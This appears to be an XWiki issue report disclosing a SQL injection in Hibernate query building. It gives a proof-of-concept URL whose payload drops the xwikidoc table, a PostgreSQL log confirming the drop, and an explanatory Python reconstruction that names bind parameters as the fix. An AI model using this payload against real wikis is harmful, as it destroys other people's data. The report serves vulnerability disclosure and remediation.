Description
SQL injection that bypasses XWiki and Hibernate security.
Against multi-lingual wikis it can be used by an anonymous user.
Also effective against single-language wikis if the user is logged in.
http://127.0.0.1:8081/xwikiTrunk/bin/view/Main\\' or ' = /; drop table xwikidoc; commit; --\
Tested using PostgreSQL and MySQL.
' is converted to '' and the following query is generated:
select doc.language from XWikiDocument as doc where doc.space = 'Main\\'' or '' = ' and doc.name = '; drop table xwikidoc; commit; --\' and (doc.language <> '' or (doc.language is not null and '' is null))
Hibernate turns \\ into \ and "Main\\''" becomes "Main\''"
Postgres log:
WARNING: nonstandard use of \' in a string literal at character 100
HINT: Use '' to write quotes in strings, or use the escape string syntax (E'...').
LOG: execute <unnamed>: select xwikidocum0_.XWD_LANGUAGE as col_0_0_ from xwikidoc xwikidocum0_ where xwikidocum0_.XWD_WEB='Main\'' or '' = ' and xwikidocum0_.XWD_NAME='
LOG: execute <unnamed>: drop table xwikidoc
LOG: execute <unnamed>: commit
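To make the mechanism above concrete, here is an added example (not code from XWiki or Hibernate) that rebuilds the concatenated query with quote-doubling and lexes it once under standard SQL rules and once with backslash escapes, as MySQL does by default and PostgreSQL does with standard_conforming_strings=off. The query text and the space/name values mirror the report; the function names are assumptions.

```python
# Quote-doubling alone does not keep a '...' literal closed: Hibernate doubled '
# but left \ alone, and a dialect that treats \ as an escape inside literals lets
# a value ending in \ consume the doubled quote.  Binding values as query
# parameters instead of splicing them into the statement text avoids this.

def escape_by_doubling(value: str) -> str:
    return value.replace("'", "''")  # the insufficient escaping in the report

def build_language_query(space: str, name: str) -> str:  # the concatenation bug
    return ("select doc.language from XWikiDocument as doc "
            f"where doc.space = '{escape_by_doubling(space)}' "
            f"and doc.name = '{escape_by_doubling(name)}' "
            "and (doc.language <> '' or (doc.language is not null and '' is null))")

def split_statements(sql: str, backslash_escapes: bool) -> list[str]:
    """Split SQL text into statements as a server lexer would: '' is an escaped
    quote, \\x is one too when backslash_escapes is set, and -- starts a comment
    outside literals.  Returns the non-empty statements."""
    statements, current = [], []
    i, n, in_literal = 0, len(sql), False
    while i < n:
        c = sql[i]
        if in_literal:
            if backslash_escapes and c == "\\" and i + 1 < n:
                current.append(sql[i:i + 2]); i += 2; continue  # \x stays inside
            if c == "'" and sql.startswith("''", i):
                current.append("''"); i += 2; continue          # doubled quote
            in_literal = c != "'"                              # lone ' closes
        elif sql.startswith("--", i):                          # comment to end of line
            nl = sql.find("\n", i); i = n if nl == -1 else nl + 1; continue
        elif c == "'":
            in_literal = True
        elif c == ";":                                         # statement boundary
            statements.append("".join(current).strip()); current = []
            i += 1; continue
        current.append(c)
        i += 1
    tail = "".join(current).strip()
    return statements + ([tail] if tail else [])

# Constructed inputs mirroring the report's URL (space / name), after Hibernate
# has already collapsed \\ to \ in the space name.
SPACE = "Main\\' or ' = "
NAME = "; drop table xwikidoc; commit; --\\"
QUERY = build_language_query(SPACE, NAME)

if __name__ == "__main__":
    for mode in (False, True):  # standard lexing: 1 statement; backslash escapes: 3
        print("backslash_escapes =", mode, "->", split_statements(QUERY, mode))
```

Under backslash-escape lexing the split yields the same three statements the Postgres log records, while a standard-conforming lexer sees one harmless query; the difference is entirely in how the server reads the literal, which is why escaping in application code is fragile and bind parameters are the fix.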
Issue Links
- depends on XWIKI-4755 Hibernate doesn't treat backslashes correctly --> sql injection (Closed)